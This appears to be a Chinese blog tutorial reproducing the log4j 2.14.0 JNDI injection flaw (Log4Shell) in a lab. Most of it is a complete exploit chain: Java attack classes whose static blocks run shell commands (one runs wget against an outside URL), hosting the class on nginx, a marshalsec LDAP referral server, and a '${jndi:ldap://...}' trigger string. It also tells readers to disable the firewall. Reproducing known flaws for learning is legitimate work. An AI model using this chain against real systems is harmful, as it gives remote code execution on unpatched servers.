log4j-2.14.0漏洞攻击复现
log4j-2.14.0漏洞攻击复现
? 刚知道log4j漏洞的时候,我就在自己负责的项目里简单测试了一下,没有测试出来也就没有再关注这个了。接下来几天的时间无论是朋友圈、聊天群、技术论坛都是在讨论这个话题的,成功引起了我的好奇,我就想复现一下这个漏洞。刚开始复现的时候为图省事我就创建了一个springboot项目,在springboot项目里无论我怎么测试都复现不了这个,然后我有怀疑是因为jdk的版本原因我使用的是jdk11,我更换了很多版本的jdk还是复现不了,直到我看到了一位大佬发布的帖子Spring Boot应对Log4j2注入漏洞官方指南中有这么一段话:
Spring Boot默认日志组件是logback,开发者通过日志门面Slf4j进行集成对接。Spring Boot 用户只有在将默认日志系统切换到 Log4J2 时才会受到此漏洞的影响。Spring Boot包含的log4j-to-slf4j和log4j-api、spring-boot-starter-logging不能独立利用。只有log4j-core在日志消息中使用和包含用户输入的应用程序容易受到攻击。
简单一句话在springboot默认配置中是不会触发这个漏洞的,而我为了图省事用的就是默认配置。接下来我创建了一个maven项目成功复现了这个漏洞。我把自己复现的过程记录下来,分享给大家。
环境准备:
| 软件 | 版本 | 描述 | 下载地址 |
|---|---|---|---|
| CentOS | 8.3.2011-x86_64-minimal | liunx操作系统 | 链接: https://pan.baidu.com/s/1pG549BKWhbveM_Pvgj595g 提取码: iur3 |
| Idk | 1.8.0_312 | Java | 链接: https://pan.baidu.com/s/1jWUd1EjQnC5yybLiJlD9OA 提取码: knc7 |
| marshalsec | 0.0.3 | java工具将数据转化为代码执行(这里是我编译好的) | 链接: https://pan.baidu.com/s/1M-qLRpb8C3DWtVG9BNojdg 提取码: mc7c |
攻击流程:
- 编写java攻击代码。
- 将编写的攻击代码编译成class文件,然后发布到文件服务器。这里我是用nginx做演示。
- marshalsec使用将编写的class用jndi发布出去。
- 本地测试触发。
开始实现:
第一步:编写攻击代码
import java.lang.Runtime;
import java.lang.Process;
/**
* @author fuping
*/
public class Attack {
static {
try {
Runtime rt = Runtime.getRuntime();
System.out.println("wget 下载图片");
String[] commands = {"/bin/bash", "-c", "wget https://raw.githubusercontent.com/duzhaosongyue/img/main/1.png"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
e.printStackTrace();
}
}
}
liunx版本的攻击代码。
import java.io.IOException;
/**
* @author fuping
*/
public class Attack {
static {
try {
Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4j进来了\",64,\"来自熊猫头的消息\")(window.close)");
} catch (IOException e) {
e.printStackTrace();
}
}
}
windows版本的攻击代码。
第二步:发布攻击代码到文件服务器
-
在虚拟机centos系统中安装nginx。可以使用一下命令安装:
yum -y install nginx -
找到hmtl文件夹。可以使用一下命令搜索:
find / -type d -name html这里我搜索到路径是 /usr/share/nginx/html。
-
上传编译好的class文件到搜索的html文件夹下。
-
启动nginx。命令如下:
sudo nginx -
使用虚拟主机ip+端口+文件名称尝试下载文件。
这里我的下载地址为 http://172.16.102.19/Attack.class 。如果出现不能下载的情况请检查防火墙是否打开 命令如下:
systemctl status firewalld #防火墙状态 systemctl stop firewalld.service #关闭防火墙 firewall systemctl disable firewalld.service #禁止防火墙开机启动 -
测试下载成功第二步完成进行下一步。
第三步:使用marshalsec发布jndi服务。
-
安装jdk1.8.0_312。
-
上传jdk-8u221-linux-x64.tar.gz到虚拟机。
-
创建/opt/java目录。创建命令:
mkdir /opt/java -
解压jdk到/opt/java目录下 。解压命令:
tar -zxf jdk-8u221-linux-x64.tar.gz -C /opt/java -
配置环境变量。命令:
sudo vim /etc/profile. (如果没有安装vim 可以使用yum -y install vim进行安装。)在profile文件最底部追加:export JAVA_HOME=/opt/java/jdk1.8.0_221 export JRE_HOME=/opt/java/jdk1.8.0_221/jre export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib:$CLASSPATH export PATH=$PATH:$JAVA_HOME/bin -
重新加载配置。执行命令 :
source /etc/profile -
测试jdk是否安装成功。执行命令:
java -version
-
-
上传marshalsec到虚拟机。执行一下命令启动jndi服务:
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://172.16.102.19/#Attack" 9991172.16.102.19 指向文件服务器地址,Attack是编译后java攻击代码的类名称,触发jndi请求后会自动拼接请求 http://172.16.102.19/Attack.class 。
上面这个命令不能后台运行,断开链接后也就终止了,后台运行使用:
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://172.16.102.19/#Attack" 9991 > log.txt >&1 &
第四步:本地触发
-
创建一个maven项目。
-
添加依赖 。
在pom.xml中添加依赖:
org.apache.logging.log4j log4j-api 2.14.0 org.apache.logging.log4j log4j-core 2.14.0 -
配置log4j。
在src/main/resources目录下创建log4j2.xml 内容如下:
注意window下路径是/,liunx下路径是\ 如果执行出现错误 请检查输出目录的/是否正确。
<?xml version="1.0" encoding="UTF-8"?>logs logs\error logs\warn %d{yyyy-MM-dd HH:mm:ss.SSS} [%t-%L] %-5level %logger{36} - %msg%n -
编写测试代码。
package com; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; /** * @author fuping */ public class Log4jTest { private static final Logger LOGGER = LogManager.getLogger(Log4jTest.class); public static void main(String[] args) { System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); LOGGER.info("{}", "${jndi:ldap://172.16.102.19:9991/Attack}"); } }
maven项目测试项目的源码可以在github下载